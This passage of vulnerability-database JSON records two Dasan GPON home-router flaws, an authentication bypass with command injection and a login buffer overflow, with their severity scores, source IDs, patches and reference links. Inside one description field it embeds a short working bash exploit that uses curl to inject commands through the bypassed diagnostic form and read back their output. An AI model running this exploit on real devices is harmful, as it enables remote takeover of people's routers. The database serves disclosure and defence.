"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-10561",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-10561",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2018-10561",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2018-10561",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2018-09230",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-189",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-120333",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-10561",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"db": "VULHUB",
"id": "VHN-120333"
},
{
"db": "VULMON",
"id": "CVE-2018-10561"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-189"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
},
{
"db": "NVD",
"id": "CVE-2018-10561"
},
{
"db": "NVD",
"id": "CVE-2018-10561"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending \"?images\" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device. Dasan GPON home router Contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. An attacker could exploit the vulnerability by bypassing the vulnerability by adding \\342\\200\\230?images\\342\\200\\231 to any of the device\u0027s URLs. Multiple Dasan GPON Routers is prone to an authentication-bypass vulnerability and a command-injection vulnerability. \nAn attacker can exploit these issues to bypass authentication or execute arbitrary commands in the context of the affected device. #!/bin/bash\n \necho \"[+] Sending the Commanda| \"\n# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices\ncurl -k -d \"XWebPageName=diag\u0026diag_action=ping\u0026wan_conlist=0\u0026dest_host=\\`$2\\`;$2\u0026ipv=0\" $1/GponForm/diag_Form?images/ 2\u003e/dev/null 1\u003e/dev/null\necho \"[+] Waitinga|.\"\nsleep 3\necho \"[+] Retrieving the ouputa|.\"\ncurl -k $1/diag.html?images/ 2\u003e/dev/null | grep adiag_result = a | sed -e as/\\\\n/\\n/ga\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10561"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
},
{
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"db": "BID",
"id": "107053"
},
{
"db": "VULHUB",
"id": "VHN-120333"
},
{
"db": "VULMON",
"id": "CVE-2018-10561"
},
{
"db": "PACKETSTORM",
"id": "147482"
}
],
"trust": 2.7
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-120333",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=44576",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120333"
},
{
"db": "VULMON",
"id": "CVE-2018-10561"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-10561",
"trust": 3.6
},
{
"db": "EXPLOIT-DB",
"id": "44576",
"trust": 3.2
},
{
"db": "BID",
"id": "107053",
"trust": 2.1
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004885",
"trust": 0.8
},
{
"db": "EXPLOITDB",
"id": "44576",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2018-09230",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201805-189",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "147482",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-120333",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-10561",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"db": "VULHUB",
"id": "VHN-120333"
},
{
"db": "VULMON",
"id": "CVE-2018-10561"
},
{
"db": "BID",
"id": "107053"
},
{
"db": "PACKETSTORM",
"id": "147482"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-189"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
},
{
"db": "NVD",
"id": "CVE-2018-10561"
}
]
},
"id": "VAR-201805-0262",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"db": "VULHUB",
"id": "VHN-120333"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09230"
}
]
},
"last_update_date": "2025-11-18T15:27:33.670000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.dasannetworks.com/en/"
},
{
"title": "GPONHomeRouters security bypass vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/128597"
},
{
"title": "Dasan GPON Home router security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79885"
},
{
"title": "Brocade Security Advisories: BSA-2018-603",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=brocade_security_advisories\u0026qid=b192ae1777abead866cbeb7d8a56bb12"
},
{
"title": "GPON",
"trust": 0.1,
"url": "https://github.com/manyunya/GPON "
},
{
"title": "GPON",
"trust": 0.1,
"url": "https://github.com/ethicalhackeragnidhra/GPON "
},
{
"title": "CVE-2018-10562",
"trust": 0.1,
"url": "https://github.com/ATpiu/CVE-2018-10562 "
},
{
"title": "GPON-home-routers-Exploit",
"trust": 0.1,
"url": "https://github.com/vhackor/GPON-home-routers-Exploit "
},
{
"title": "GPON",
"trust": 0.1,
"url": "https://github.com/f3d0x0/GPON "
},
{
"title": "GPON",
"trust": 0.1,
"url": "https://github.com/Truongnn92/GPON "
},
{
"title": "underattack-py",
"trust": 0.1,
"url": "https://github.com/underattack-today/underattack-py "
},
{
"title": "Sniper",
"trust": 0.1,
"url": "https://github.com/samba234/Sniper "
},
{
"title": "Kn0ck",
"trust": 0.1,
"url": "https://github.com/telnet22/Kn0ck "
},
{
"title": "Sn1per",
"trust": 0.1,
"url": "https://github.com/unusualwork/Sn1per "
},
{
"title": "Sn1per",
"trust": 0.1,
"url": "https://github.com/oneplus-x/Sn1per "
},
{
"title": "api.greynoise.io",
"trust": 0.1,
"url": "https://github.com/GreyNoise-Intelligence/api.greynoise.io "
},
{
"title": "Exp101tsArchiv30thers",
"trust": 0.1,
"url": "https://github.com/nu11secur1ty/Exp101tsArchiv30thers "
},
{
"title": "awesome-cve-poc_qazbnm456",
"trust": 0.1,
"url": "https://github.com/xbl3/awesome-cve-poc_qazbnm456 "
},
{
"title": "PoC-in-GitHub",
"trust": 0.1,
"url": "https://github.com/hectorgie/PoC-in-GitHub "
},
{
"title": "CVE-POC",
"trust": 0.1,
"url": "https://github.com/0xT11/CVE-POC "
},
{
"title": "PoC-in-GitHub",
"trust": 0.1,
"url": "https://github.com/nomi-sec/PoC-in-GitHub "
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/gafgyt-botnet-ddos-mirai/165424/"
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/d-link-iot-tor-gafgyt-variant/164529/"
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/inside-hoaxcalls-botnet-success-failure/156107/"
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/wicked-botnet-uses-passel-of-exploits-to-target-iot/132125/"
},
{
"title": "BleepingComputer",
"trust": 0.1,
"url": "https://www.bleepingcomputer.com/news/security/gpon-routers-attacked-with-new-zero-day/"
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"db": "VULMON",
"id": "CVE-2018-10561"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-189"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120333"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
},
{
"db": "NVD",
"id": "CVE-2018-10561"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.3,
"url": "https://www.exploit-db.com/exploits/44576/"
},
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/107053"
},
{
"trust": 2.1,
"url": "https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/"
},
{
"trust": 1.0,
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2018-10561"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10561"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10561"
},
{
"trust": 0.3,
"url": "http://www.dasannetworks.com/en/"
},
{
"trust": 0.3,
"url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2018-603"
},
{
"trust": 0.3,
"url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2018-604"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/287.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/manyunya/gpon"
},
{
"trust": 0.1,
"url": "https://github.com/atpiu/cve-2018-10562"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10562"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"db": "VULHUB",
"id": "VHN-120333"
},
{
"db": "VULMON",
"id": "CVE-2018-10561"
},
{
"db": "BID",
"id": "107053"
},
{
"db": "PACKETSTORM",
"id": "147482"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-189"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
},
{
"db": "NVD",
"id": "CVE-2018-10561"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"db": "VULHUB",
"id": "VHN-120333"
},
{
"db": "VULMON",
"id": "CVE-2018-10561"
},
{
"db": "BID",
"id": "107053"
},
{
"db": "PACKETSTORM",
"id": "147482"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-189"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
},
{
"db": "NVD",
"id": "CVE-2018-10561"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-05-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"date": "2018-05-04T00:00:00",
"db": "VULHUB",
"id": "VHN-120333"
},
{
"date": "2018-05-04T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10561"
},
{
"date": "2019-02-18T00:00:00",
"db": "BID",
"id": "107053"
},
{
"date": "2018-05-04T00:32:22",
"db": "PACKETSTORM",
"id": "147482"
},
{
"date": "2018-05-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-189"
},
{
"date": "2018-06-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-004885"
},
{
"date": "2018-05-04T03:29:00.227000",
"db": "NVD",
"id": "CVE-2018-10561"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-05-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"date": "2019-03-04T00:00:00",
"db": "VULHUB",
"id": "VHN-120333"
},
{
"date": "2019-03-04T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10561"
},
{
"date": "2019-02-18T00:00:00",
"db": "BID",
"id": "107053"
},
{
"date": "2019-02-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-189"
},
{
"date": "2018-06-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-004885"
},
{
"date": "2025-11-05T19:23:25.363000",
"db": "NVD",
"id": "CVE-2018-10561"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-189"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dasan GPON home router Authentication vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-189"
}
],
"trust": 0.6
}
}
VAR-201801-0924
Vulnerability from variot - Updated: 2024-11-23 22:26
Buffer overflow on Dasan GPON ONT WiFi Router H640X 12.02-01121, 2.77p1-1124, and 3.03p2-1146 devices allows remote attackers to execute arbitrary code via a long POST request to the login_action function in /cgi-bin/login_action.cgi (aka cgipage.cgi). The Dasan GPON ONT WiFi Router H640X contains a buffer error vulnerability. Information may be obtained, information may be altered, and the service may be put into a denial-of-service (DoS) state. Dasan GPON ONT WiFi Router is a wireless router device from DASAN Networks, Korea. A buffer overflow vulnerability exists in Dasan GPON ONT WiFi Router H640X 12.02-0112, 2.77p1-1124, and 3.03p2-1146.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201801-0924",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "h640x",
"scope": "eq",
"trust": 1.6,
"vendor": "dasannetworks",
"version": "3.03p2-1146"
},
{
"model": "h640x",
"scope": "eq",
"trust": 1.6,
"vendor": "dasannetworks",
"version": "12.02-01121"
},
{
"model": "h640x",
"scope": "eq",
"trust": 1.6,
"vendor": "dasannetworks",
"version": "2.77p1-1124"
},
{
"model": "h640x",
"scope": "eq",
"trust": 0.8,
"vendor": "dasan",
"version": "12.02-01121"
},
{
"model": "h640x",
"scope": "eq",
"trust": 0.8,
"vendor": "dasan",
"version": "2.77p1-1124"
},
{
"model": "h640x",
"scope": "eq",
"trust": 0.8,
"vendor": "dasan",
"version": "3.03p2-1146"
},
{
"model": "networks dasan gpon ont wifi router h640x",
"scope": "eq",
"trust": 0.6,
"vendor": "dasan",
"version": "12.02-0112"
},
{
"model": "networks dasan gpon ont wifi router 2.77p1-1124",
"scope": null,
"trust": 0.6,
"vendor": "dasan",
"version": null
},
{
"model": "networks dasan gpon ont wifi router 3.03p2-1146",
"scope": null,
"trust": 0.6,
"vendor": "dasan",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-04394"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-012245"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-811"
},
{
"db": "NVD",
"id": "CVE-2017-18046"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:dasannetworks:h640x_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-012245"
}
]
},
"cve": "CVE-2017-18046",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2017-18046",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-04394",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-109129",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2017-18046",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-18046",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2017-18046",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2018-04394",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201801-811",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-109129",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-04394"
},
{
"db": "VULHUB",
"id": "VHN-109129"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-012245"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-811"
},
{
"db": "NVD",
"id": "CVE-2017-18046"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Buffer overflow on Dasan GPON ONT WiFi Router H640X 12.02-01121, 2.77p1-1124, and 3.03p2-1146 devices allows remote attackers to execute arbitrary code via a long POST request to the login_action function in /cgi-bin/login_action.cgi (aka cgipage.cgi). The Dasan GPON ONT WiFi Router H640X contains a buffer error vulnerability. Information may be obtained, information may be altered, and the service may be put into a denial-of-service (DoS) state. Dasan GPON ONT WiFi Router is a wireless router device from DASAN Networks, Korea. A buffer overflow vulnerability exists in Dasan GPON ONT WiFi Router H640X 12.02-0112, 2.77p1-1124, and 3.03p2-1146.",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-18046"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-012245"
},
{
"db": "CNVD",
"id": "CNVD-2018-04394"
},
{
"db": "VULHUB",
"id": "VHN-109129"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-18046",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-012245",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201801-811",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-04394",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-109129",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-04394"
},
{
"db": "VULHUB",
"id": "VHN-109129"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-012245"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-811"
},
{
"db": "NVD",
"id": "CVE-2017-18046"
}
]
},
"id": "VAR-201801-0924",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-04394"
},
{
"db": "VULHUB",
"id": "VHN-109129"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-04394"
}
]
},
"last_update_date": "2024-11-23T22:26:33.464000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.dasannetworks.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-012245"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-109129"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-012245"
},
{
"db": "NVD",
"id": "CVE-2017-18046"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "https://blogs.securiteam.com/index.php/archives/3552"
},
{
"trust": 1.1,
"url": "https://pastebin.com/yxd9s46a"
},
{
"trust": 1.1,
"url": "https://twitter.com/ankit_anubhav/status/982261670394249216"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-18046"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18046"
},
{
"trust": 0.6,
"url": "https://blogs.securiteam.com/index.php/archives/3552#more"
},
{
"trust": 0.6,
"url": "https://blogs.securiteam.com/index.php/archives/3552#more-3552"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-04394"
},
{
"db": "VULHUB",
"id": "VHN-109129"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-012245"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-811"
},
{
"db": "NVD",
"id": "CVE-2017-18046"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-04394"
},
{
"db": "VULHUB",
"id": "VHN-109129"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-012245"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-811"
},
{
"db": "NVD",
"id": "CVE-2017-18046"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-04394"
},
{
"date": "2018-01-21T00:00:00",
"db": "VULHUB",
"id": "VHN-109129"
},
{
"date": "2018-02-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-012245"
},
{
"date": "2018-01-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201801-811"
},
{
"date": "2018-01-21T22:29:00.290000",
"db": "NVD",
"id": "CVE-2017-18046"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-04394"
},
{
"date": "2018-04-08T00:00:00",
"db": "VULHUB",
"id": "VHN-109129"
},
{
"date": "2018-02-28T00:00:00",
"db": "JVNDB",
